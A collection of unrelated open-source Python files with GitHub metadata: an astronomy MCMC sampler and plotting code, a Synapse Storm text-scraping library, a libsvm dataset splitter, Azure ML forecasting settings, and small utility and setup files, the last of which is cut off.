:ndim:
        The number of parameters in the model that emcee must find. In this case it is always 2: tq and tau.
:nwalkers:
The number of walkers that step around the parameter space. Must be an even integer number larger than ndim.
:nsteps:
The number of steps to take in the final run of the MCMC sampler. Integer.
:burnin:
The number of steps to take in the inital burn-in run of the MCMC sampler. Integer.
:start:
        The positions in the tq and tau parameter space at which to start the walkers. An array of shape (1,2).
:ur:
Observed u-r colour of a galaxy; k-corrected. An array of shape (N,1) or (N,).
:sigma_ur:
Error on the observed u-r colour of a galaxy. An array of shape (N,1) or (N,).
:nuvu:
Observed nuv-u colour of a galaxy; k-corrected. An array of shape (N,1) or (N,).
:sigma_nuvu:
Error on the observed nuv-u colour of a galaxy. An array of shape (N,1) or (N,).
:age:
Observed age of a galaxy, often calculated from the redshift i.e. at z=0.1 the age ~ 12.5. Must be in units of Gyr. An array of shape (N,1) or (N,).
:id:
ID number to specify which galaxy this run is for.
:ra:
right ascension of source, used for identification purposes
:dec:
declination of source, used for identification purposes
RETURNS:
:samples:
        Array of shape (nsteps*nwalkers, 2) containing the positions of the walkers at all steps for both parameters.
:samples_save:
Location at which the :samples: array was saved to.
"""
if method == 'yes' or method=='y':
global u
global v
a = N.searchsorted(ages, age)
b = N.array([a-1, a])
print 'interpolating function, bear with...'
g = grid[N.where(N.logical_or(grid[:,0]==ages[b[0]], grid[:,0]==ages[b[1]]))]
values = lu[N.where(N.logical_or(grid[:,0]==ages[b[0]], grid[:,0]==ages[b[1]]))]
f = LinearNDInterpolator(g, values, fill_value=(-N.inf))
look = f(age, grid[:10000, 1], grid[:10000, 2])
lunuv = look[:,0].reshape(100,100)
v = interp2d(tq, tau, lunuv)
luur = look[:,1].reshape(100,100)
u = interp2d(tq, tau, luur)
else:
pass
print 'emcee running...'
p0 = [start + 1e-4*N.random.randn(ndim) for i in range(nwalkers)]
sampler = emcee.EnsembleSampler(nwalkers, ndim, lnprob, threads=2, args=(ur, sigma_ur, nuvu, sigma_nuvu, age))
""" Burn in run here..."""
pos, prob, state = sampler.run_mcmc(p0, burnin)
lnp = sampler.flatlnprobability
N.save('lnprob_burnin_'+str(int(id))+'_'+str(ra)+'_'+str(dec)+'_'+str(time.strftime('%H_%M_%d_%m_%y'))+'.npy', lnp)
samples = sampler.chain[:,:,:].reshape((-1,ndim))
samples_save = 'samples_burn_in_'+str(int(id))+'_'+str(ra)+'_'+str(dec)+'_'+str(time.strftime('%H_%M_%d_%m_%y'))+'.npy'
N.save(samples_save, samples)
sampler.reset()
print 'Burn in complete...'
""" Main sampler run here..."""
sampler.run_mcmc(pos, nsteps)
lnpr = sampler.flatlnprobability
N.save('lnprob_run_'+str(int(id))+'_'+str(ra)+'_'+str(dec)+'_'+str(time.strftime('%H_%M_%d_%m_%y'))+'.npy', lnpr)
samples = sampler.chain[:,:,:].reshape((-1,ndim))
samples_save = 'samples_'+str(int(id))+'_'+str(ra)+'_'+str(dec)+'_'+str(time.strftime('%H_%M_%d_%m_%y'))+'.npy'
N.save(samples_save, samples)
print 'Main emcee run completed.'
return samples, samples_save
#Define function to plot the walker positions as a function of the step
def walker_plot(samples, nwalkers, limit, id):
    """ Plotting function to visualise the steps of the walkers in each parameter dimension for the tq and tau theta values.
:samples:
        Array of shape (nsteps*nwalkers, 2) produced by the emcee EnsembleSampler in the sample function.
:nwalkers:
The number of walkers that step around the parameter space used to produce the samples by the sample function. Must be an even integer number larger than ndim.
:limit:
Integer value less than nsteps to plot the walker steps to.
:id:
ID number to specify which galaxy this plot is for.
RETURNS:
:fig:
The figure object
"""
s = samples.reshape(nwalkers, -1, 2)
s = s[:,:limit, :]
fig = P.figure(figsize=(8,5))
ax1 = P.subplot(2,1,1)
ax2 = P.subplot(2,1,2)
for n in range(len(s)):
ax1.plot(s[n,:,0], 'k')
ax2.plot(s[n,:,1], 'k')
ax1.tick_params(axis='x', labelbottom='off')
ax2.set_xlabel(r'step number')
ax1.set_ylabel(r'$t_{quench}$')
ax2.set_ylabel(r'$\tau$')
P.subplots_adjust(hspace=0.1)
save_fig = 'walkers_steps_'+str(int(id))+'_'+str(time.strftime('%H_%M_%d_%m_%y'))+'.pdf'
fig.savefig(save_fig)
return fig
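# Illustrative usage sketch (not part of the original script; the walker count,
# step limit and galaxy id below are hypothetical values): plot the first 400
# steps of each of 100 walkers from a samples array returned by sample() above.
#
#     fig = walker_plot(samples, 100, 400, 8647474)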
def corner_plot(s, labels, extents, bf, id):
""" Plotting function to visualise the gaussian peaks found by the sampler function. 2D contour plots of tq against tau are plotted along with kernelly smooth histograms for each parameter.
:s:
Array of shape (#, 2) for either the smooth or disc produced by the emcee EnsembleSampler in the sample function of length determined by the number of walkers which resulted at the specified peak.
:labels:
List of x and y axes labels i.e. disc or smooth parameters
:extents:
Range over which to plot the samples, list shape [[xmin, xmax], [ymin, ymax]]
:bf:
Best fit values for the distribution peaks in both tq and tau found from mapping the samples. List shape [(tq, poserrtq, negerrtq), (tau, poserrtau, negerrtau)]
:id:
ID number to specify which galaxy this plot is for.
RETURNS:
:fig:
The figure object
"""
x, y = s[:,0], s[:,1]
fig = P.figure(figsize=(6.25,6.25))
ax2 = P.subplot2grid((3,3), (1,0), colspan=2, rowspan=2)
ax2.set_xlabel(labels[0])
ax2.set_ylabel(labels[1])
triangle.hist2d(x, y, ax=ax2, bins=100, extent=extents, plot_contours=True)
ax2.axvline(x=bf[0][0], linewidth=1)
ax2.axhline(y=bf[1][0], linewidth=1)
[l.set_rotation(45) for l in ax2.get_xticklabels()]
[j.set_rotation(45) for j in ax2.get_yticklabels()]
ax2.tick_params(axis='x', labeltop='off')
ax1 = P.subplot2grid((3,3), (0,0),colspan=2)
den = kde.gaussian_kde(x[N.logical_and(x>=extents[0][0], x<=extents[0][1])])
pos = N.linspace(extents[0][0], extents[0][1], 750)
ax1.plot(pos, den(pos), 'k-', linewidth=1)
ax1.axvline(x=bf[0][0], linewidth=1)
ax1.axvline(x=bf[0][0]+bf[0][1], c='b', linestyle='--')
ax1.axvline(x=bf[0][0]-bf[0][2], c='b', linestyle='--')
ax1.set_xlim(extents[0][0], extents[0][1])
ax12 = ax1.twiny()
ax12.set_xlim(extents[0][0], extents[0][1])
ax12.set_xticks(N.array([1.87, 3.40, 6.03, 8.77, 10.9, 12.5]))
ax12.set_xticklabels(N.array([3.5, 2.0 , 1.0, 0.5, 0.25, 0.1]))
[l.set_rotation(45) for l in ax12.get_xticklabels()]
ax12.tick_params(axis='x', labelbottom='off')
ax12.set_xlabel(r'$z$')
ax1.tick_params(axis='x', labelbottom='off', labeltop='off')
ax1.tick_params(axis='y', labelleft='off')
ax3 = P.subplot2grid((3,3), (1,2), rowspan=2)
ax3.tick_params(axis='x', labelbottom='off')
ax3.tick_params(axis='y', labelleft='off')
den = kde.gaussian_kde(y[N.logical_and(y>=extents[1][0], y<=extents[1][1])])
pos = N.linspace(extents[1][0], extents[1][1], 750)
ax3.plot(den(pos), pos, 'k-', linewidth=1)
ax3.axhline(y=bf[1][0], linewidth=1)
ax3.axhline(y=bf[1][0]+bf[1][1], c='b', linestyle='--')
ax3.axhline(y=bf[1][0]-bf[1][2], c='b', linestyle='--')
ax3.set_ylim(extents[1][0], extents[1][1])
if os.path.exists(str(int(id))+'.jpeg') == True:
ax4 = P.subplot2grid((3,3), (0,2), rowspan=1, colspan=1)
img = mpimg.imread(str(int(id))+'.jpeg')
ax4.imshow(img)
ax4.tick_params(axis='x', labelbottom='off', labeltop='off')
ax4.tick_params(axis='y', labelleft='off', labelright='off')
P.tight_layout()
P.subplots_adjust(wspace=0.0)
P.subplots_adjust(hspace=0.0)
return fig
""" Load the magnitude bandpass filters using idl save """
filters = readsav('ugriz.sav')
fuvwave= filters.ugriz.fuvwave[0]
fuvtrans = filters.ugriz.fuvtrans[0]
nuvwave= filters.ugriz.nuvwave[0]
nuvtrans = filters.ugriz.nuvtrans[0]
uwave= filters.ugriz.uwave[0]
utrans = filters.ugriz.utrans[0]
gwave= filters.ugriz.gwave[0]
gtrans = filters.ugriz.gtrans[0]
rwave= filters.ugriz.rwave[0]
rtrans = filters.ugriz.rtrans[0]
iwave= filters.ugriz.iwave[0]
itrans = filters.ugriz.itrans[0]
zwave= filters.ugriz.zwave[0]
ztrans = filters.ugriz.ztrans[0]
vwave= filters.ugriz.vwave[0]
vtrans = filters.ugriz.vtrans[0]
jwave= filters.ugriz.jwave[0]
jtrans = filters.ugriz.jtrans[0]
hwave= filters.ugriz.hwave[0]
htrans = filters.ugriz.htrans[0]
kwave= filters.ugriz.kwave[0]
ktrans = filters.ugriz.ktrans[0]
| {
"content_hash": "e22c884bb96703493e97894ad851a4cd",
"timestamp": "",
"source": "github",
"line_count": 555,
"max_line_length": 411,
"avg_line_length": 46.38558558558559,
"alnum_prop": 0.6239123679303915,
"repo_name": "zooniverse/starpy",
"id": "090b00647e1c412e963c9b3ffaa70f92e1ae0e3b",
"size": "25744",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "posterior.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "53011"
}
],
"symlink_target": ""
} |
import asyncio
import logging
import regex
import synapse.common as s_common
import synapse.lib.scrape as s_scrape
import synapse.lib.spooled as s_spooled
import synapse.lib.stormtypes as s_stormtypes
logger = logging.getLogger(__name__)
@s_stormtypes.registry.registerLib
class LibScrape(s_stormtypes.Lib):
'''
A Storm Library for providing helpers for scraping nodes from text.
'''
_storm_locals = (
{'name': 'context', 'desc': '''
Attempt to scrape information from a blob of text, getting the context information about the values found.
Notes:
This does call the ``scrape`` Storm interface if that behavior is enabled on the Cortex.
Examples:
Scrape some text and make nodes out of it::
for ($form, $valu, $info) in $lib.scrape.context($text) {
[ ( *$form ?= $valu ) ]
}
''',
'type': {'type': 'function', '_funcname': '_methContext',
'args': (
{'name': 'text', 'type': 'str',
'desc': 'The text to scrape', },
),
'returns': {'name': 'yields', 'type': 'dict',
'desc': 'A dictionary of scraped values, rule types, and offsets scraped from the text.',
}}},
{'name': 'ndefs', 'desc': '''
Attempt to scrape node form, value tuples from a blob of text.
Examples:
Scrape some text and attempt to make nodes out of it::
for ($form, $valu) in $lib.scrape($text) {
[ ( *$form ?= $valu ) ]
}''',
'type': {'type': 'function', '_funcname': '_methNdefs',
'args': (
{'name': 'text', 'type': 'str',
'desc': 'The text to scrape', },
),
'returns': {'name': 'yields', 'type': 'list',
'desc': 'A list of (form, value) tuples scraped from the text.', }}},
{'name': 'genMatches', 'desc': '''
        genMatches is a generic helper function for constructing scrape interfaces using pure Storm.
        It accepts the text and a regex pattern, and produces results that can easily be used to create nodes.
Notes:
The pattern must have a named regular expression match for the key ``valu`` using the
named group syntax. For example ``(somekey\\s)(?P<valu>[a-z0-9]+)\\s``.
Examples:
A scrape implementation with a regex that matches name keys in text::
$re="(Name\\:\\s)(?P<valu>[a-z0-9]+)\\s"
$form="ps:name"
function scrape(text, form) {
$ret = $lib.list()
for ($valu, $info) in $lib.scrape.genMatches($text, $re) {
$ret.append(($form, $valu, $info))
}
return ( $ret )
}
''',
'type': {'type': 'function', '_funcname': '_methGenMatches',
'args': (
{'name': 'text', 'type': 'str',
'desc': 'The text to scrape', },
{'name': 'pattern', 'type': 'str',
'desc': 'The regular expression pattern to match against.', },
{'name': 'fangs', 'type': 'list', 'default': None,
'desc': 'A list of (src, dst) pairs to refang from text. The src must be equal or larger '
'than the dst in length.'},
{'name': 'flags', 'type': 'int', 'default': regex.IGNORECASE,
'desc': 'Regex flags to use (defaults to IGNORECASE).'},
),
'returns': {'name': 'yields', 'type': 'list',
'desc': ''}}}
)
_storm_lib_path = ('scrape', )
def getObjLocals(self):
return {
'ndefs': self._methNdefs,
'context': self._methContext,
'genMatches': self._methGenMatches,
}
async def __call__(self, text, ptype=None, refang=True, unique=True):
text = await s_stormtypes.tostr(text)
form = await s_stormtypes.tostr(ptype, noneok=True)
refang = await s_stormtypes.tobool(refang)
unique = await s_stormtypes.tobool(unique)
# Remove this in 3.0.0 since it is deprecated.
s_common.deprecated('Directly calling $lib.scrape()')
await self.runt.warnonce('$lib.scrape() is deprecated. Use $lib.scrape.ndefs().')
async with await s_spooled.Set.anit() as items: # type: s_spooled.Set
for item in s_scrape.scrape(text, ptype=form, refang=refang, first=False):
if unique:
if item in items:
continue
await items.add(item)
yield item
await asyncio.sleep(0)
@s_stormtypes.stormfunc(readonly=True)
async def _methContext(self, text):
text = await s_stormtypes.tostr(text)
genr = self.runt.snap.view.scrapeIface(text)
async for (form, valu, info) in genr:
yield (form, valu, info)
@s_stormtypes.stormfunc(readonly=True)
async def _methNdefs(self, text):
text = await s_stormtypes.tostr(text)
genr = self.runt.snap.view.scrapeIface(text, unique=True)
async for (form, valu, _) in genr:
yield (form, valu)
@s_stormtypes.stormfunc(readonly=True)
async def _methGenMatches(self, text, pattern, fangs=None, flags=regex.IGNORECASE):
text = await s_stormtypes.tostr(text)
pattern = await s_stormtypes.tostr(pattern)
fangs = await s_stormtypes.toprim(fangs)
flags = await s_stormtypes.toint(flags)
opts = {}
regx = regex.compile(pattern, flags=flags)
_fangs = None
_fangre = None
offsets = None
scrape_text = text
if fangs:
_fangs = {src: dst for (src, dst) in fangs}
_fangre = s_scrape.genFangRegex(_fangs)
scrape_text, offsets = s_scrape.refang_text2(text, re=_fangre, fangs=_fangs)
for info in s_scrape.genMatches(scrape_text, regx, opts=opts):
valu = info.pop('valu')
if _fangs and offsets:
s_scrape._rewriteRawValu(text, offsets, info)
yield valu, info
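# Illustrative sketch (not part of this module) of the underlying synapse.lib.scrape
# helpers used by _methGenMatches above; the pattern and text are hypothetical:
#
#     regx = regex.compile(r'(Name:\s)(?P<valu>[a-z0-9]+)\s', flags=regex.IGNORECASE)
#     for info in s_scrape.genMatches('Name: alice ', regx, opts={}):
#         valu = info.pop('valu')   # each match dict carries the named 'valu' group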
| {
"content_hash": "d88791ce5cbb8101f9ec3fca8873d6e4",
"timestamp": "",
"source": "github",
"line_count": 163,
"max_line_length": 119,
"avg_line_length": 40.263803680981596,
"alnum_prop": 0.5125704708212707,
"repo_name": "vertexproject/synapse",
"id": "86fe9e1b7917a808e5a9f1f55efe55fa2b627b25",
"size": "6563",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "synapse/lib/stormlib/scrape.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "4010"
},
{
"name": "HTML",
"bytes": "3"
},
{
"name": "Python",
"bytes": "5894053"
},
{
"name": "Shell",
"bytes": "10776"
}
],
"symlink_target": ""
} |
'''
Created on Oct 24, 2014
This script splits a CSV dataset into a fixed number of randomly sampled rows and then splits that subset into training and testing sets
@author: wahib
'''
from __future__ import print_function
from sklearn import datasets
from sklearn.cross_validation import train_test_split
from sklearn.grid_search import GridSearchCV
from sklearn.metrics import classification_report
from sklearn import svm
import numpy as np
import csv
import pylab as pl
from sklearn.metrics import roc_curve, auc
from sklearn import preprocessing
import pandas as pd
import random
import sys
print(__doc__)
def splitForLibsvm(folderPath, csvPath, rowExtractCount):
trainTargetArray = []
trainDataArray = []
#folderPath = '10000rows/'
#fullData = pd.read_csv('csv/1percent_of_200mels.csv', delimiter=",",skiprows=0, dtype=np.float16)
#fullData = pd.read_csv('csv/200mels.csv', delimiter=",",skiprows=0, dtype=np.float16)
fullData = pd.read_csv(csvPath, delimiter=",",skiprows=0, dtype=np.float16)
shape = fullData.shape
print('size of full data ', shape)
trainData = fullData.iloc[:,:-1] #all except last column
trainTarget = fullData.iloc[:,-1] # only last column
print('len of traindata', len(trainData))
#print('print traindata', trainData)
#only commented when full dataset needs to be used
print('count of rows to extract', rowExtractCount)
rows = random.sample(trainData.index,rowExtractCount)
trainData = trainData.ix[rows]
trainTarget = trainTarget.ix[rows]
print('target size', trainTarget.shape)
#print('target values', trainTarget)
trainData = np.array(trainData)
trainTarget = np.array(trainTarget)
trainTarget = np.squeeze(trainTarget)
#print(trainTarget)
#print(trainData)
#only commented for 200k dataset because it was nullifying all values
trainData = preprocessing.scale(trainData)
print('scaling-normalization over for trainData')
# Split the dataset in two equal parts
X_train, X_test, y_train, y_test = train_test_split(
trainData, trainTarget, test_size=0.2, random_state=123)
print('X_train : ', X_train.shape)
print('y_train : ', y_train.shape)
print('X_test : ', X_test.shape)
print('y_test : ', y_test.shape)
#with open('csv/libsvm/'+folderPath+'/Ytr.txt', 'w') as FOUT:
with open(folderPath+'/Ytr.txt', 'w') as FOUT:
np.savetxt(FOUT, y_train ,fmt='%d',delimiter=',')
with open(folderPath+'/Xtr.csv', 'w') as FOUT:
np.savetxt(FOUT, X_train, fmt='%1.5f',delimiter=',')
with open(folderPath+'/Xte.csv', 'w') as FOUT:
np.savetxt(FOUT, X_test, fmt='%1.5f',delimiter=',')
with open(folderPath+'/Yte.txt', 'w') as FOUT:
np.savetxt(FOUT, y_test, fmt='%d',delimiter=',')
print('train and test csv files created')
if __name__ == '__main__':
    if len(sys.argv) < 4:
        print('3 arguments required, i.e. [folderPath] [csvPath] [rowExtractCount]')
    else:
        folderPath = sys.argv[1]
        csvPath = sys.argv[2]
        # random.sample() needs an integer count, so convert the CLI argument
        rowExtractCount = int(sys.argv[3])
        splitForLibsvm(folderPath, csvPath, rowExtractCount)
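# Illustrative invocation (the folder, CSV path and row count below are
# hypothetical placeholders, not files shipped with this repository):
#
#   python split_for_libsvm.py csv/libsvm/10000rows csv/200mels.csv 10000
#
# This scales the features, draws 10000 random rows and writes Xtr.csv/Ytr.txt
# (80% train) and Xte.csv/Yte.txt (20% test) into the given folder.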
| {
"content_hash": "94238c57bbf57ff48996981873c5d814",
"timestamp": "",
"source": "github",
"line_count": 103,
"max_line_length": 106,
"avg_line_length": 29.184466019417474,
"alnum_prop": 0.7082501663339986,
"repo_name": "wahibhaq/android-speaker-audioanalysis",
"id": "3fa8b0d5d544ec66e51799e441c1ad628e683398",
"size": "3006",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Python/Basic/split_for_libsvm.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "98"
},
{
"name": "C",
"bytes": "5311"
},
{
"name": "C++",
"bytes": "142895"
},
{
"name": "Java",
"bytes": "415228"
},
{
"name": "Makefile",
"bytes": "201515"
},
{
"name": "Matlab",
"bytes": "7068"
},
{
"name": "Python",
"bytes": "15695"
},
{
"name": "Shell",
"bytes": "238"
},
{
"name": "TeX",
"bytes": "9581"
}
],
"symlink_target": ""
} |
import os
from typet import Object
from typet import String
class EnvironmentVariable(Object):
name: String[1:]
@property
def value(self):
return os.environ.get(self.name)
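# Illustrative usage sketch (not part of the original module); the variable
# name below is an arbitrary example:
#
#     home = EnvironmentVariable(name='HOME')
#     print(home.value)   # value of $HOME, or None if the variable is unset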
| {
"content_hash": "d4a1477b4a51142559f70d5f818d12d0",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 40,
"avg_line_length": 16.333333333333332,
"alnum_prop": 0.6989795918367347,
"repo_name": "zancas/containenv",
"id": "75c937670cc1b6845e7348e88fb3ab86c2d3247c",
"size": "220",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "containment/types/environment.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "39438"
},
{
"name": "Shell",
"bytes": "268"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
try:
from urllib.request import urlopen
import urllib.parse as urlparse
from urllib.parse import urlencode
except ImportError:
import urlparse
from urllib2 import urlopen
from urllib import urlencode
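# Illustrative usage sketch (not part of the original module): downstream code
# can import these names uniformly on both Python 2 and 3, e.g.
#
#     from imobis.compat import urlopen, urlencode
#     body = urlencode({'q': 'test'})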
| {
"content_hash": "f7196fb5dd870a79774d465e064ac6d0",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 38,
"avg_line_length": 26.4,
"alnum_prop": 0.7575757575757576,
"repo_name": "kmike/imobis",
"id": "9e4a850f337696c677aec7bc0094cbb9cdc05e4a",
"size": "288",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "imobis/compat.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "8396"
}
],
"symlink_target": ""
} |
from typing import List, Union
from azure.ai.ml._restclient.v2022_10_01_preview.models import (
AutoForecastHorizon,
AutoSeasonality,
AutoTargetLags,
AutoTargetRollingWindowSize,
CustomForecastHorizon,
CustomSeasonality,
CustomTargetLags,
CustomTargetRollingWindowSize,
ForecastHorizonMode,
)
from azure.ai.ml._restclient.v2022_10_01_preview.models import ForecastingSettings as RestForecastingSettings
from azure.ai.ml._restclient.v2022_10_01_preview.models import (
SeasonalityMode,
TargetLagsMode,
TargetRollingWindowSizeMode,
)
from azure.ai.ml.entities._mixins import RestTranslatableMixin
class ForecastingSettings(RestTranslatableMixin):
"""Forecasting settings for an AutoML Job.
:param country_or_region_for_holidays: The country/region used to generate holiday features. These should be ISO
3166 two-letter country/region code, for example 'US' or 'GB'.
:type country_or_region_for_holidays: str
:param forecast_horizon: The desired maximum forecast horizon in units of time-series frequency.
:type forecast_horizon: int
:param target_lags: The number of past periods to lag from the target column. Use 'auto' to use the automatic
heuristic based lag.
:type target_lags: Union[str, int, List[int]]
:param target_rolling_window_size: The number of past periods used to create a rolling window average of the
target column.
:type target_rolling_window_size: int
:param frequency: Forecast frequency. When forecasting, this parameter represents the period with which the
forecast is desired, for example daily, weekly, yearly, etc.
:type frequency: str
:param feature_lags: Flag for generating lags for the numeric features with 'auto'
:type feature_lags: str
:param seasonality: Set time series seasonality as an integer multiple of the series frequency. Use 'auto' for
automatic settings.
:type seasonality: Union[str, int]
:param use_stl: Configure STL Decomposition of the time-series target column. use_stl can take two values:
'season' - only generate season component and 'season_trend' - generate both season and trend components.
:type use_stl: str
    :param short_series_handling_config: The parameter defining how AutoML should handle short time series.
:type short_series_handling_config: str
:param target_aggregate_function: The function to be used to aggregate the time series target column to conform
        to a user-specified frequency. If target_aggregation_function is set but the freq parameter is not set,
        an error is raised. The possible target aggregation functions are: "sum", "max", "min" and "mean".
:type target_aggregate_function: str
:param time_column_name: The name of the time column.
:type time_column_name: str
:param time_series_id_column_names: The names of columns used to group a timeseries.
:type time_series_id_column_names: Union[str, List[str]]
"""
def __init__(
self,
*,
country_or_region_for_holidays: str = None,
cv_step_size: int = None,
forecast_horizon: Union[str, int] = None,
target_lags: Union[str, int, List[int]] = None,
target_rolling_window_size: Union[str, int] = None,
frequency: str = None,
feature_lags: str = None,
seasonality: Union[str, int] = None,
use_stl: str = None,
short_series_handling_config: str = None,
target_aggregate_function: str = None,
time_column_name: str = None,
time_series_id_column_names: Union[str, List[str]] = None,
):
self.country_or_region_for_holidays = country_or_region_for_holidays
self.cv_step_size = cv_step_size
self.forecast_horizon = forecast_horizon
self.target_lags = target_lags
self.target_rolling_window_size = target_rolling_window_size
self.frequency = frequency
self.feature_lags = feature_lags
self.seasonality = seasonality
self.use_stl = use_stl
self.short_series_handling_config = short_series_handling_config
self.target_aggregate_function = target_aggregate_function
self.time_column_name = time_column_name
self.time_series_id_column_names = time_series_id_column_names
def _to_rest_object(self) -> RestForecastingSettings:
forecast_horizon = None
if isinstance(self.forecast_horizon, str):
forecast_horizon = AutoForecastHorizon()
elif self.forecast_horizon:
forecast_horizon = CustomForecastHorizon(value=self.forecast_horizon)
target_lags = None
if isinstance(self.target_lags, str):
target_lags = AutoTargetLags()
elif self.target_lags:
lags = [self.target_lags] if not isinstance(self.target_lags, list) else self.target_lags
target_lags = CustomTargetLags(values=lags)
target_rolling_window_size = None
if isinstance(self.target_rolling_window_size, str):
target_rolling_window_size = AutoTargetRollingWindowSize()
elif self.target_rolling_window_size:
target_rolling_window_size = CustomTargetRollingWindowSize(value=self.target_rolling_window_size)
seasonality = None
if isinstance(self.seasonality, str):
seasonality = AutoSeasonality()
elif self.seasonality:
seasonality = CustomSeasonality(value=self.seasonality)
time_series_id_column_names = self.time_series_id_column_names
if isinstance(self.time_series_id_column_names, str) and self.time_series_id_column_names:
time_series_id_column_names = [self.time_series_id_column_names]
return RestForecastingSettings(
country_or_region_for_holidays=self.country_or_region_for_holidays,
cv_step_size=self.cv_step_size,
forecast_horizon=forecast_horizon,
time_column_name=self.time_column_name,
target_lags=target_lags,
target_rolling_window_size=target_rolling_window_size,
seasonality=seasonality,
frequency=self.frequency,
feature_lags=self.feature_lags,
use_stl=self.use_stl,
short_series_handling_config=self.short_series_handling_config,
target_aggregate_function=self.target_aggregate_function,
time_series_id_column_names=time_series_id_column_names,
)
@classmethod
def _from_rest_object(cls, obj: RestForecastingSettings) -> "ForecastingSettings":
forecast_horizon = None
if obj.forecast_horizon and obj.forecast_horizon.mode == ForecastHorizonMode.AUTO:
forecast_horizon = obj.forecast_horizon.mode.lower()
elif obj.forecast_horizon:
forecast_horizon = obj.forecast_horizon.value
rest_target_lags = obj.target_lags
target_lags = None
if rest_target_lags and rest_target_lags.mode == TargetLagsMode.AUTO:
target_lags = rest_target_lags.mode.lower()
elif rest_target_lags:
target_lags = rest_target_lags.values
target_rolling_window_size = None
if obj.target_rolling_window_size and obj.target_rolling_window_size.mode == TargetRollingWindowSizeMode.AUTO:
target_rolling_window_size = obj.target_rolling_window_size.mode.lower()
elif obj.target_rolling_window_size:
target_rolling_window_size = obj.target_rolling_window_size.value
seasonality = None
if obj.seasonality and obj.seasonality.mode == SeasonalityMode.AUTO:
seasonality = obj.seasonality.mode.lower()
elif obj.seasonality:
seasonality = obj.seasonality.value
return cls(
country_or_region_for_holidays=obj.country_or_region_for_holidays,
cv_step_size=obj.cv_step_size,
forecast_horizon=forecast_horizon,
target_lags=target_lags,
target_rolling_window_size=target_rolling_window_size,
frequency=obj.frequency,
feature_lags=obj.feature_lags,
seasonality=seasonality,
use_stl=obj.use_stl,
short_series_handling_config=obj.short_series_handling_config,
target_aggregate_function=obj.target_aggregate_function,
time_column_name=obj.time_column_name,
time_series_id_column_names=obj.time_series_id_column_names,
)
def __eq__(self, other: object) -> bool:
if not isinstance(other, ForecastingSettings):
return NotImplemented
return (
self.country_or_region_for_holidays == other.country_or_region_for_holidays
and self.cv_step_size == other.cv_step_size
and self.forecast_horizon == other.forecast_horizon
and self.target_lags == other.target_lags
and self.target_rolling_window_size == other.target_rolling_window_size
and self.frequency == other.frequency
and self.feature_lags == other.feature_lags
and self.seasonality == other.seasonality
and self.use_stl == other.use_stl
and self.short_series_handling_config == other.short_series_handling_config
and self.target_aggregate_function == other.target_aggregate_function
and self.time_column_name == other.time_column_name
and self.time_series_id_column_names == other.time_series_id_column_names
)
def __ne__(self, other: object) -> bool:
return not self.__eq__(other)
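# Illustrative usage sketch (not part of this module): constructing settings for
# a daily series. The column name, horizon and frequency below are hypothetical
# placeholders chosen only to show the keyword-only constructor.
#
#     settings = ForecastingSettings(
#         time_column_name='date',
#         forecast_horizon=14,              # or 'auto'
#         target_lags='auto',
#         target_rolling_window_size='auto',
#         frequency='D',
#     )
#     rest_obj = settings._to_rest_object()
#     round_trip = ForecastingSettings._from_rest_object(rest_obj)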
| {
"content_hash": "ebddfecf28c9b38f23ac17a2b74e1772",
"timestamp": "",
"source": "github",
"line_count": 200,
"max_line_length": 118,
"avg_line_length": 48.125,
"alnum_prop": 0.6742857142857143,
"repo_name": "Azure/azure-sdk-for-python",
"id": "24303737461dc9e580c6f37af96b3b2f1bb5819d",
"size": "9871",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/ml/azure-ai-ml/azure/ai/ml/entities/_job/automl/tabular/forecasting_settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
import os
from setuptools import find_packages
from setuptools import setup
PACKAGE_ROOT = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(PACKAGE_ROOT, 'README.rst')) as file_obj:
README = file_obj.read()
# NOTE: This is duplicated throughout and we should try to
# consolidate.
SETUP_BASE = {
'author': 'Google Cloud Platform',
'author_email': 'jjg+google-cloud-python@google.com',
'scripts': [],
'url': 'https://github.com/GoogleCloudPlatform/google-cloud-python',
'license': 'Apache 2.0',
'platforms': 'Posix; MacOS X; Windows',
'include_package_data': True,
'zip_safe': False,
'classifiers': [
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Topic :: Internet',
],
}
REQUIREMENTS = [
'google-cloud-core >= 0.22.1, < 0.23dev',
'grpcio >= 1.0.2, < 2.0dev',
]
setup(
name='google-cloud-bigtable',
version='0.22.0',
description='Python Client for Google Cloud Bigtable',
long_description=README,
namespace_packages=[
'google',
'google.cloud',
],
packages=find_packages(),
install_requires=REQUIREMENTS,
**SETUP_BASE
)
| {
"content_hash": "5d59984a84982fe58e440b4f7c6ebc85",
"timestamp": "",
"source": "github",
"line_count": 55,
"max_line_length": 72,
"avg_line_length": 28.181818181818183,
"alnum_prop": 0.6161290322580645,
"repo_name": "quom/google-cloud-python",
"id": "08cd2eb7d6b46754e8e9c16d05fd43e061b47980",
"size": "2126",
